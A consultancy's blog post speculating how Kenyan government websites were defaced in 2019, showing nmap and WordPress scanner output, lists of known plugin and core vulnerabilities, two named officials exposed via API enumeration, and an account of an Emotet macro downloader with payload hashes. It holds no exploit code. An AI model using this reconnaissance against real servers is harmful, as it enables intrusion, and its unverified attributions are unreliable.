Kenyan Government Websites Hacked/Defaced 2019: A Hypothesis On How The Hack Occurred

A superficial look into the hacking event that occurred on 1st June 2019 where at least 18 government (GOK) owned and operated websites were breached and defaced reveals the level of negligence that floods the Kenya ICT industry.

By: DigiHut Systems | Published: Tuesday 23rd of July 2019


Kenyan Government Websites Hacked/Defaced 2019: A Hypothesis On How The Hack Occurred

The Kenyan government has been riddled with cases of corruption in every sector. The same corruption leads to the hiring of incompetent individuals to perform tasks that are critical to government services. According to a survey conducted by the EACC, bribery, favoritism, nepotism, and embezzlement of funds remain the most prevalent form of corruption in Kenya. The same happened in this case.

Our Hypothesis on How the attack Occured

A survey conducted by the Ethics and Anti-Corruption Commission (EACC) in 2016 shows that procurement, finance, public service boards, road, and public works are among the top departments prone to corruption. Procurement of IT services is also conducted in a similar manner where one has to part with a 'kakitu' or know someone very prominent to be awarded a tender. Like all most hustlers in Kenya, most individuals who purport to be IT experts in this country are merely self-taught web designers/ poorly trained ICT individuals from unequipped local colleges. For the most part, they know little or nothing regarding cybersecurity as it applied to web servers and web applications.

A superficial look into the hacking event that occurred on 1st June 2019 where at least 18 government (GOK) owned and operated websites were breached and defaced reveals the level of negligence that floods the Kenya ICT industry.

I started my investigation on Tue June 4th at 21:28:14 on behalf of DigiHut Systems from the domain (belonging to the National Youth Service) which a quick name server lookup reveals it resolved to the IP


			Non-authoritative answer:

Further enumeration of the host reveals that the main authors registered on the Site are Matayo Odongo who's liked in profile shows he works at GOK-Kenya as an Information and Communication Technology Officer (ICTO) and Caroline Jomo who's LinkedIn profile indicates works as an ICTO at the Ministry of Regional Development Authorities (MORDA).

		[!] 2 users exposed via API:
		| ID | Name          | URL                                       |
		| 3  | matayo odongo | |
		| 4  | caroline jomo | |

Opening the IP resolves to the National Government Affirmative Action Fund website whose URL is (

now a quick nmap enumeration of potential server folders reveals something interesting... the server is misconfigured. It serves two different websites based on the port used to access it.

port 80 (http) -> serves the which is a Joomla based.

port 443 (https) -> redirects to the defaced version of the National Development Implementation and technical Communication department (NDITC) which is supposed to be a subdomain of the ICT Authority ( served at which is built on WordPress...

	| => nmap -sV --script=http-enum
Starting Nmap 7.70 ( ) at 2019-06-04 21:30 EAT
Nmap scan report for
Host is up (0.070s latency).
Not shown: 998 closed ports
80/tcp  open  http     Apache httpd (PHP 7.0.32)
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /logs/: Logs
|   /robots.txt: Robots file
|   /administrator/manifests/files/joomla.xml: Joomla version 3.8.1
|   /language/en-GB/en-GB.xml: Joomla version 3.8.1
|   /htaccess.txt: Joomla!
|   /README.txt: Interesting, a readme.
|   /bin/: Potentially interesting folder
|   /cache/: Potentially interesting folder
|   /images/: Potentially interesting folder
|   /includes/: Potentially interesting folder
|   /libraries/: Potentially interesting folder
|   /modules/: Potentially interesting folder
|   /templates/: Potentially interesting folder
|_  /tmp/: Potentially interesting folder
|_http-server-header: Apache
443/tcp open  ssl/http Apache httpd (PHP 7.0.32)
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache

Nmap done: 1 IP address (1 host up) scanned in 515.72 seconds

Now I wanted to quit here seeing that the WordPress version in use is version 2.7 at best because that is just plain negligence... but then again it could be that the so-called hackers managed to upload a custom-made website instead of defacing the original website... I mean that what I would do... Who has time to modify themes...

To continue I did I quick google search of the parent IP... seeing that the ICT Authority decided to economize and use a single misconfigured server with a single IP to server multiple websites... and I bet there was little isolation of the websites and when one was pwned all were pwned. That's my first hypothesis so far at least... the question is which vulnerability did they exploit...

So I continued the analysis...

I googled the IP...

Now, this was just unbelievable... was hosted on the same server...

other websites were also hosted on the same server as shown below

Now a complete reverse look of the subnet reveals even more interesting results as attached in the file below...

Now for the kicker...

I'll let everyone have some fun first just google or visit my Results and explore...

for those who don't understand the results...

There was an upsurge of malware analysis conducted on URLs, and documents hosted on the web server; Most of them malicious.

The first appearance of the searches dates back to April 13, 2019. So the server was most likely compromised during this period.

The scans may be from two parties.

  1. the Hackers trying to check if their hacks were detectable of fully undetectable (FUD) as evident from the malware scans.
  2. Cybersecurity analysts after the incident occurred.

Now the later seems more viable given that owning an account on one of these online malware analysis services can set you back Kshs. 600,000 a year. Reported incidents are from  @Spamhaus an International Threat Intelligence Organization providing highly-trusted real-time actionable data on spam, phishing, botnets and malware sources., @Cryptolaemus1 a malware/bug hunter.

That's it... my first hypothesis has been confirmed...

I didn't even take an hour...

The attack could not have been targeted hence I will only present one scenario that describes how they got access, how they leveraged the server and why they defaced the websites.

SCENARIO 1: NULLED SCRIPTS (Lucky script kiddie...)

No this is more probable and accounts as my 2nd hypothesis.

Since the majority of the websites are 'proudly' powered by WordPress, the attackers might not have necessarily targeted government websites but were merely lucky to land on top government websites running nulled/cracked but bugged versions of themes and plugins from popular file sharing websites such as Which raises concerns regarding the competency of web developers hired by the GOK to build their websites. Now, this is a viable hypothesis given that I found at least four government and parastatal websites using nulled themes as shown below.

1. KEMSA website
[+] Name: healthflex - v1.0.0
 |  Location:
 |  Readme:
 |  Changelog:
[!] An error_log file has been found:
 |  Style URL:
 |  Theme Name: HealthFlex (shared on
 |  Theme URI:
 |  Description: Multipurpose Medical WordPress Theme
 |  Author: Plethora Themes
 |  Author URI:
 |  License: GNU General Public License v2 or later
 |  License URI:
 |  Tags: responsive-layout, theme-options, translation-ready
[!] Title: WordPress Slider Revolution Local File Disclosure
[i] Fixed in: 4.1.5

[!] Title: WordPress Slider Revolution Shell Upload
[i] Fixed in: 3.0.96

Since the scripts are nulled, one cannot get the latest versions of the themes/plugins hence leaving the server susceptible to hacking through publicly available exploits code (mostly Proof-of-Concept [POC] codes). For instance the Judicial Service Commision website ( revealed it uses outdated plugins.

[!] Title: LayerSlider 4.6.1 - Style Editing CSRF
[i] Fixed in: 5.2.0

[!] Title: LayerSlider 4.6.1 - Remote Path Traversal File Access
[i] Fixed in: 5.2.0

[!] Title: LayerSlider <= 6.2.0 - CSRF / Authenticated Stored XSS & SQL Injection
[i] Fixed in: 6.2.1

[!] Title: Visual Composer <= 4.7.3 - Multiple Unspecified Cross-Site Scripting (XSS)
[i] Fixed in: 4.7.4

Results from the IFMIS websites are even more troubling... the website is outdated which means it is susceptible to multiple exploits.

[+] WordPress version 3.1.1 identified from stylesheets numbers
 | Released: 2011-04-04
 | Changelog:
[!] 38 vulnerabilities identified from the version number

[!] Title: WordPress 3.1 PCRE Library Remote DoS
[!] Title: WordPress 2.5 - 3.3.1 XSS in swfupload
[!] Title: WordPress 1.5.1 - 3.5 XMLRPC Pingback API Internal/External Port Scanning
[!] Title: WordPress 1.5.1 - 3.5 XMLRPC pingback additional issues
[!] Title: WordPress <= 3.3.2 Cross-Site Scripting (XSS) in wp-includes/default-filters.php
[!] Title: WordPress <= 3.3.2 wp-admin/media-upload.php sensitive information disclosure or bypass
[!] Title: WordPress <= 3.3.2 wp-admin/includes/class-wp-posts-list-table.php sensitive information disclosure by visiting a draft
[!] Title: WordPress 3.0 - 3.6 Crafted String URL Redirect Restriction Bypass
[!] Title: WordPress 2.0.3 - 3.9.1 (except 3.7.4 / 3.8.4) CSRF Token Brute Forcing
[!] Title: WordPress 3.0 - 3.9.1 Authenticated Cross-Site Scripting (XSS) in Multisite
[!] Title: WordPress 3.0-3.9.2 - Unauthenticated Stored Cross-Site Scripting (XSS) 
[!] Title: WordPress <= 4.0 - Long Password Denial of Service (DoS)
[!] Title: WordPress <= 4.0 - Server Side Request Forgery (SSRF)
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
[i] Fixed in: 4.7.1
[!] Title: WordPress <= 4.7 - Post via Email Checks by Default
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
[!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
[!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
[!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
[!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
[!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
[!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
[!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
[!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
[!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
[!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion

Now at this point, I was sure I had understood how the attacker managed to pwn the server and why he defaced the websites and what his actual intent was.

He exploited a vulnerability in one of the WordPress websites allowing him to upload a PHP shell. Most probably a known and identifiable PHP shell based on its signature. It was probably created using weevely since I hardly doubt the attacker is capable of building his own shell script. Having had access to the server... the attacker uploaded a Microsoft Office document packed with malicious macros-based malware downloader which has been widely shared in the darknet and is also employed by the troublesome Emotet Banking Malware.

The bugged doc file that was used to deliver the malware was downloadable from I have the actual file from the server in case someone needs it...

Now the attacker tries to trick the user into allowing macros in the document by placing a message that one must click "Enable Editing" and "Enable Content" before the document reveals the content. By so doing, a user activates macros which are disabled by default in MS Office due to their exploitable nature. On Enabling content, the document runs a PowerShell script that calls on the download URL ( dropping a Malware on the user's PC and running it. 

Now like any other hacker out there... the main motivation for hacking is money. The downloader MS Office Document downloaded an executable from the compromised Judiciary website

The Downloaded executable was probably the Emotet Banking Malware which sent back data from penetrated PCs back to as shown by the report below. 

The URL was used as the command and control center for receiving and downloading commands allowing the download of more malware onto the user's PC. 

First seen Filename Payload (SHA256)
2019-04-27 820069be5c2a0e524297553c96b55b58e1858e4239520f7106d99d72d99967be
2019-04-27 5ca46b89aa0596dba59df9c631d3096247f0cc2b5daa570f64cbf474eff2ba53
2019-04-27 4f38c78c1f006f3759c4c23cf4b7895733197bc51b81a9a6a638b0903a7c1b89
2019-04-27 ff51f78c2935421df0629c134f37385b490069412047cafe363b5b12a065f272
2019-04-27 c8085a7f0595ee94b1a96482c05a84eed62ae58e696bc7016d94f73af867b85b
2019-04-27 55ab5e5298e6cbc1b333a84f0bdf855b76f879a29b0d8e098ecdde588b52baeb
2019-04-27 c3a72df3c50f2278721e9d1b1f0adbc9e0bcec12e586a510eb076f7319d4c768
2019-04-27 16d4662a15cffca403c32dece2a0b22e5f68f3a8215ecfa92efd0cc4f4a6d8ce
2019-04-27 a15c1bb84e207f7f72cc9c35c234902c44caf60f7dfc8a2677b74ec1e9942efa
2019-04-27 3b36ace5b4029c3fbba9cc8061ff2c7acc8131bf756f7f2eb81634de18efddaf
2019-04-27 b4f24969a471a548a4e658b8b4abfb7c0c1dfc324b00f3ac4b779f2b01620784
2019-04-27 2b50d7d5dcf30ebbef59ffe83f1259cc265ccc066768ea82a9401c023ec63f44
2019-04-27 b92da8b8b3c80b89a7c9926747bc8d563b9a7b14b70d72a25937cf605f32c589
2019-04-27 db3b20b4e89eca297b03aff9c79ac820f93bed10e9be45f0ecdc5a924304390d
2019-04-27 8ba6aa3aa099d3f7fdfd53f865c7dc10bfcd09e265207f0e34a4448dd2d32851
2019-04-27 7e5b4db89cfbddb2d784b916dd879a4604a6d16a7d4dd626fd0340117e04bfd7
2019-04-27 054cf228adbe433c3ca8769341a43ae6bb42048951fd4d7cd43c995d60969a01
2019-04-27 edb8ae5ae21559e8146b0037e42d63af84e2b7c2f48ff1940c2b4001ba2ec9a8
2019-04-27 dfc9cc4a6bd5b83f371b19ef2b18c5fcae4f04be8695e663d15bd573a7171c9f
2019-04-27 63b50e7ce93fdab0b95a444d02d907daf74f81056ab94368b3dd4955f8767e0d
2019-04-27 ac7795737e4e5241c90976342a6bee354e2af567f853a9bf2a570b9752691512
2019-04-27 0e8328b3d43dfdac59a19a90e7bd3653553d609119da138340d73f653f8cdfbf
2019-04-27 066a6661fd36554e12d065facb375a2088aca07e2ae5a1ecffa56252ca258336
2019-04-27 6318dc4f090441aead7d4acb91b5b4ce484042d127558c7071d0c4084ae6bfea
2019-04-27 214eced5942bcd5bd6843bfab1182141a75506db774259558fb6c946bbedaec8
2019-04-27 2b1027327de2d9ed79c2853a3acadb63925d36f98b95bd473d0b6bbb9ee321a5
2019-04-27 ee7f7082709691917156416246e6353c6b6fca4e76b6ffa2e7e866be7f7f1489
2019-04-27 8907e1020926056dfd79d477cf5964be83262a2b8972646f551140108b864533
2019-04-26 04f919189a3876ed2bf9816314453eaed9cb4b2adc9c07a2c463b413361ebec2
2019-04-26 d70427f00688eeee7531670750d3c5986efa5696b4e9ba11347e18d44e6521f6
2019-04-26 c61ab072f22c25fff7582807e7018ac903487d4d7ca9c244ddebb924e4a74900
2019-04-26 7f40512543eb30de588f8644ea6f943bf22dce328ee85e4dd12894e3de24fc51
2019-04-26 f015c0b946a1926a27b4b294f4153e79bfc52ad269331ed606c486c0a3f72846
2019-04-26 9d16da900d9c1bbbce1efcd2378ba5457fbdc1a781f222bf6d99c33369c1ca3d
2019-04-26 1725656a6b24195280a084c99487261e0154bfe4eb7c8cc89b65d4dba9639501
2019-04-26 f4ce6ee084f3ca0bf3e0bbff369a166d4984dd7dc8f41b89b7aeff48c16e3e3a
2019-04-26 aadc149340745edc98d54f8186cf6c662ec58ffc5a2b89fdbc8db403052edc0a
2019-04-26 9d99cd5977a02d5f30ee16b4639c94e990f80a8170acbbde30c6a13305fa2422
2019-04-26 77ed29e9c6b4c53f4078f71978755cbb9b1899bbb8e5e94555106e752e40b3a7
2019-04-26 0defa5c0f8de2bb24bdc40ff4d931b60e11a588cca90417f320bfe00569d5003
2019-04-26 cee67757ca0d02787506eccc72f55c4e84529f304b65ebabec344febb2f6c517
2019-04-26 e4583e4e230b9f364df52567ed3d6dac8e52e2310f2439f117d9d11d55942bdc
2019-04-26 5ccca8b1f7bd845a8ec5a79e2abaeaf288113c49efcfc5488c6db3e49d2b2c79
2019-04-26 0a6d9914849c4506b1bd53cafc6affa40c9bf578aeea3bff887691eb84b0e1d2
2019-04-26 2aef6025972a45a0db18ce3d06c25c26bd2356ce3f49b57e795c13240706eb24
2019-04-26 4666910187899ff52b949b35125af4df226803cbe656d723984aa9fd2e01d455
2019-04-26 c1ed7eac4ae69ce8294f88100545b9941113778f7045594ea08230f211353c4b
2019-04-26 4e42d0c617354a24659a547bd1f5eb155953d8fc65a03d260af6ec0f2dd16342
2019-04-26 875bfef2fe7d463be5c334c111939d05a8edb835465bf9db81eb0b2b1d61b31b
2019-04-26 f5f584e0910f3a8783782f00146a402d7b00a7a6b6c497507f37eda997221275
2019-04-26 900bb55b27fc5d1e365f82daf511f2274fbefd0d29c26fe3227382db662e55ed
2019-04-26 209e0cc7acaf75f1b78919d33c7d66f308cb1c5d088bf2d8588106e47a3c99ef
2019-04-26 f61b5d35177fc00dd7e49f47d6efda64cb25c1427615fd1eaa483a3616aed587
2019-04-26 216658c10d876d66737da243659955be12554ce7e5290ba54e329b7a88873e7b
2019-04-26 b09046a6c5e2eb180d24e00b573768d1507bb903c1c05ac9569edee8254e81ad
2019-04-26 143486c325ad5e42c9b8d90c8bc3d1696f97b9c7814758cbc13a09217ea194f9
2019-04-26 df0edbfa7f40d103c957229d2f4a0a32dd45a02137682543d0ac3e5114e09e18
2019-04-26 e5b8f69e063e27e8796bd1d935f74d9b5f24313e76de5bc7dad9708febd99f09
2019-04-26 8c2fa2c978a225e8b04ece69ec2172f8a487a4d155cdd0a9e5d990f867bbe360
2019-04-26 67e18a69327f02613d677ea247b3a1ffa1386addf3cfc5443299ce1b85ad51fc
2019-04-26 fcd62dbf48f60bb8f2575a72e7ef5f6d082ba2370ebf55a3848bad0cdf9cddcd
2019-04-26 e0d2dc6087fe531754b5c20b9eaeaf8afe83cde9d29e01f730950b251d7708b2
2019-04-26 4012dddfc157354f16425471f3875d115143a33785425c19fc0a7cd59640296a
2019-04-25 cebc80294c29b4e05755048e35c38886e7ab27a8689530c05a8ecc3ff33807f2
2019-04-25 2b68c5e2006a8ebf65434d8bed988fb97c47b41a6c1ee22f84dd2c5d2b6f76cb
2019-04-25 3d5f036a7b13afd732e46962862c272979bb7000e127a8b17e42a938584ebf92
2019-04-25 9813bca9eb30519a28edf728999389fb2390779bb17306e268c4b46c100cdc84
2019-04-25 cb2122877fd42a065e9097fd2a59e5e982d8073143f053919a0749c10a43e863
2019-04-25 df87d73a6bc9b56ad6e175667669de268253a6f6bcfadceb53e710d7fb5ce1b1
2019-04-25 c9a700c2039d6714b3ea47584a49fcd276afbd3531fb79fdea21ca7612c8336f
2019-04-25 e2e1734cf70dabc293604f30a667c415dc5504bf2b0834102da3472723ab3c74
2019-04-25 f21d4807cb744df7794adeb6b9473eab6019d1d7616bf6c5d329d7e449daffd1

Each uploaded file contains various types of information from the victim's PC as denoted by the letters preceding the hyphen (-). This is a clever trick used by most hackers to trigger more actions in a nested ways. i.e once BG-****.zip is received do this... etc 

Other URLs used to send and receive commands include:

Date Checked URL
Jun 1, 2019
Jun 1, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 31, 2019
May 30, 2019
May 30, 2019
May 30, 2019
May 28, 2019
May 25, 2019
May 24, 2019
May 20, 2019
May 13, 2019
May 7, 2019
Apr 29, 2019
Apr 25, 2019
Apr 17, 2019
Apr 8, 2019
Apr 8, 2019

Now the attacker probably thought he would access to banking credentials. However, he had done his research well since most users in Kenya transact through M-Pesa and rarely conduct online-banking. A complete analysis of the Emotet Malware can be found on Malwarebytes in case anyone needs to read it...

The Emotet Banking Malware has numerous capabilities ranging from opening up the Remote Desktop Protocol (RDP), stealing stored passwords and keylogging the user's activities.

Now given that the server was compromised in mid-April... the attacker probably got frustrated by the results he was getting from the banking trojan and decided to create a name for himself in the hacking world by defacing the websites.

My final thoughts...

the hacker codenamed... W4R10K translates to Warlock (for those unable to read GEEK)... was a solo hacker who just got lucky...

He/She was just a simple script kiddie who probably didn't even understand the magnitude of data he had gotten access to. That's why he decided to deface the websites... a show of might among his peers which means he probably left numerous digital footprints that will lead to his capture given that the so-called GOK Cyber Security Team is capable of solving the crime... I mean how long does it take to clone a server... get things up and running as investigations continue... and why do they call themselves the GOK Cyber Security Team given the multiple vulnerabilities GOK websites contain... It's their mandate to conduct regular vulnerability scans and security audits... I mean how can a Government run such servers without incorporating an effective Intrusion detection and prevention system (IDPS)... such negligence and incompetence. I have no more to say other than Well done W4rl0k you showed us the true state of the GOK Cyber Security.

Our Cyber Security Consultancy Services

DigiHut Systems offers a range of Vulnerability Assessment, Penetration Testing, Cyber Security Training, Application Development, Physical Security Vulnerability Assessment, and Risk and Mitigation Services to meet your needs. If you still haven't found what you are looking for, kindly reach us to learn more about our services.

Contact US